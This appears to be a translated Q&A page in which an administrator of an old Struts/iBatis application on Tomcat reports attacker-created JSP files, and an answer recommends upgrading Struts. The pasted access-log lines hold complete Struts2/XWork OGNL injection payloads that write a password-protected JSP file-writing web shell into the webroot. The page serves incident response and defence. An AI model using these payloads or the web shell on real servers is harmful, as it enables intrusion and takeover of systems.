Подтвердить что ты не робот

Java/Tomcat взломали

В последнее время на моем сервере tomcat появилось несколько файлов, которые, очевидно, являются попытками хакера. Я поддерживаю более старое приложение, которое использует struts и ibatis вместе с различными другими фреймворками. Создано три файла: system1.jsp под фактической папкой webapp, так что tomcat/webapps/ROOT/system1.jsp, а затем два других файла, которые были созданы в tomcat/webapps/system2.jsp и tomcat/webapps/system3.jsp.

Содержимое этих файлов странно, похоже, оно пытается создать учетную запись пользователя, которая выглядит как длинный снимок. Способ настройки расположений невозможен, так как они действительно будут доходить до этих файлов jsp, что заставляет меня беспокоиться, так это то, что они могли вообще создавать эти файлы. Как я могу предотвратить это?

Вот журнал apache из хака, а также остальная часть кода,

198.211.11.202 - - [28/Apr/2013:02:05:34 -0500] "GET request!start.do?
('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)
(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\[email protected]@getRequest()')(d))&(i12)(('\\43xman\\[email protected]@getResponse()')(d))&(i13)(('\\43xman.getWriter().println(\\43req.getServletContext().getRealPath(%22\\u005c%22))')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(new\\40java.lang.StringBuilder(\\43req.getRealPath(%22\\u005c%22)).append(@[email protected]).append(%22system1.jsp%22).toString())')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E HTTP/1.1" 200 12387
198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\[email protected]@EMPTY_SET')(c))&(g)(('\\43req\\[email protected]@getRequest()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43req.getRealPath(%22\\u005c%22))')(d))&(i99)(('\\43xman.getWriter().close()')(d)) HTTP/1.1" 200 29
198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\[email protected]@getRequest()')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(\\43req.getParameter(%22path%22))')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E&path=/opt/tomcat/webapp/ROOT/system2.jsp HTTP/1.1" 200 12387
4b9b3361

ОТВЕТЫ

Ответ 1

Я считаю, что приведенная здесь уязвимость достаточно точно соответствует тому, что вы видите: http://www.exploit-db.com/exploits/14360/

Таким образом, это проблема с инфраструктурой Struts/XWork, и вы должны изучить ее обновление до более новой версии. В этих конкретных отчетах об уязвимостях говорится, что версия 2.2.0 устраняет эту проблему.